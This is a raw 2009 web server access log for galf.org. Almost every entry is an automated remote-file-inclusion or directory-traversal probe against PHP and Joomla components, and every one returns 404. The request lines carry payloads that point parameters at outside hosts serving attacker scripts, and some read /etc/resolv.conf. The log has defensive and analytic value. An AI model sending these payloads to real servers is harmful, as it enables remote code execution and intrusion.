75.151.248.42 - - [28/Dec/2009:07:15:23 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:15:51 -0800] "GET /logs/access_090817.log%20/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:15:52 -0800] "GET /logs/access_090817.log%20/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:16:00 -0800] "GET /logs/access_090824.log%20/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:16:00 -0800] "GET /logs/access_090824.log%20/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
69.175.29.2 - - [28/Dec/2009:07:16:47 -0800] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/19/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "galf.org"
69.175.29.2 - - [28/Dec/2009:07:16:47 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/19/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "galf.org"
69.175.29.2 - - [28/Dec/2009:07:16:47 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/19/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "galf.org"
65.55.207.138 - - [28/Dec/2009:07:17:56 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:07:19:30 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [28/Dec/2009:07:19:30 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [28/Dec/2009:07:19:30 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [28/Dec/2009:07:21:32 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.62.128.254 - - [28/Dec/2009:07:22:12 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:07:22:12 -0800] "GET /logs/access_090706.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:07:22:12 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:07:23:36 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:07:23:36 -0800] "GET /logs/access_090921.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:07:23:36 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:27:16 -0800] "GET /logs/access_091116.log%20%20/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:27:16 -0800] "GET /logs/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:07:27:16 -0800] "GET /logs/access.log%20%20/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:07:27:16 -0800] "GET /myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:07:27:19 -0800] "GET /myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:27:19 -0800] "GET /logs/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:27:21 -0800] "GET /myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:27:21 -0800] "GET /logs/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:27:21 -0800] "GET /logs/access_091116.log%20%20/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:27:21 -0800] "GET /myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:07:27:21 -0800] "GET /logs/access.log%20%20/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:07:27:21 -0800] "GET /logs/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.195.37.161 - - [28/Dec/2009:07:27:36 -0800] "GET /logs/access_090427.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:28:07 -0800] "GET /myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:28:07 -0800] "GET /logs/access_091116.log%20%20/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:28:07 -0800] "GET /myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:07:28:07 -0800] "GET /logs/access.log%20%20/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:07:28:07 -0800] "GET /logs/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:07:28:10 -0800] "GET /logs/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:28:19 -0800] "GET /myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:28:22 -0800] "GET /logs/access_091116.log%20%20/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:28:22 -0800] "GET /logs/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:07:28:33 -0800] "GET /logs/access.log%20%20/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.223.205.250 - - [28/Dec/2009:07:28:33 -0800] "GET /myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.223.205.250 - - [28/Dec/2009:07:28:33 -0800] "GET /logs/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:07:28:47 -0800] "GET /logs/access.log%20%20/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.223.205.250 - - [28/Dec/2009:07:28:51 -0800] "GET /logs/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.223.205.250 - - [28/Dec/2009:07:28:51 -0800] "GET /logs/access.log%20%20/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.223.205.250 - - [28/Dec/2009:07:28:51 -0800] "GET /myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
211.255.32.182 - - [28/Dec/2009:07:29:14 -0800] "GET /logs/access.log%20%20/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.255.32.182 - - [28/Dec/2009:07:29:14 -0800] "GET /logs/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.255.32.182 - - [28/Dec/2009:07:29:14 -0800] "GET /myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.126.154.177 - - [28/Dec/2009:07:29:57 -0800] "GET /logs/access_091116.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:29:57 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:29:57 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:29:58 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:29:58 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:29:58 -0800] "GET /logs/access_091116.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:30:14 -0800] "GET /logs/access_091221.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:30:17 -0800] "GET /logs/access_091221.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:30:49 -0800] "GET /logs/access_091123.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:30:56 -0800] "GET /logs/access_091123.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:30:56 -0800] "GET /logs/access_090914.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:31:02 -0800] "GET /logs/access_090914.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:31:02 -0800] "GET /logs/access_091214.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:31:08 -0800] "GET /logs/access_091214.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:31:08 -0800] "GET /logs/access_091026.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:31:14 -0800] "GET /logs/access_091026.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:31:14 -0800] "GET /logs/access_091102.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.61.206 - - [28/Dec/2009:07:31:15 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.61.206 - - [28/Dec/2009:07:31:15 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.61.206 - - [28/Dec/2009:07:31:18 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:31:20 -0800] "GET /logs/access_091102.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:31:29 -0800] "GET /logs/access_091130.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:31:35 -0800] "GET /logs/access_091130.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.61.206 - - [28/Dec/2009:07:31:43 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.61.206 - - [28/Dec/2009:07:31:44 -0800] "GET /logs/access_091221.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [28/Dec/2009:07:31:51 -0800] "GET /logs/access_091221.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [28/Dec/2009:07:32:14 -0800] "GET /logs/access_091123.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.247.146 - - [28/Dec/2009:07:32:15 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.247.146 - - [28/Dec/2009:07:32:15 -0800] "GET /logs/access_091116.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.247.146 - - [28/Dec/2009:07:32:15 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [28/Dec/2009:07:32:24 -0800] "GET /logs/access_090914.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [28/Dec/2009:07:32:24 -0800] "GET /logs/access_091214.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [28/Dec/2009:07:32:34 -0800] "GET /logs/access_091026.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [28/Dec/2009:07:32:34 -0800] "GET /logs/access_091102.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.247.146 - - [28/Dec/2009:07:32:43 -0800] "GET /logs/access_091221.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:32:52 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [28/Dec/2009:07:32:52 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [28/Dec/2009:07:32:52 -0800] "GET /logs/access.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
99.198.118.186 - - [28/Dec/2009:07:32:56 -0800] "GET /logs/access_091130.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.247.146 - - [28/Dec/2009:07:33:00 -0800] "GET /logs/access_091123.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.247.146 - - [28/Dec/2009:07:33:01 -0800] "GET /logs/access_090914.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:33:01 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [28/Dec/2009:07:33:01 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [28/Dec/2009:07:33:01 -0800] "GET /logs/access.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.34.247.146 - - [28/Dec/2009:07:33:05 -0800] "GET /logs/access_091214.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.247.146 - - [28/Dec/2009:07:33:06 -0800] "GET /logs/access_091026.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.247.146 - - [28/Dec/2009:07:33:10 -0800] "GET /logs/access_091102.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [28/Dec/2009:07:33:11 -0800] "GET /logs/access_091116.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:33:14 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [28/Dec/2009:07:33:14 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [28/Dec/2009:07:33:14 -0800] "GET /logs/access.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.126.154.177 - - [28/Dec/2009:07:33:16 -0800] "GET /logs/access_091221.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.247.146 - - [28/Dec/2009:07:33:21 -0800] "GET /logs/access_091130.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:33:23 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.126.154.177 - - [28/Dec/2009:07:33:23 -0800] "GET /logs/access_091221.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:33:23 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
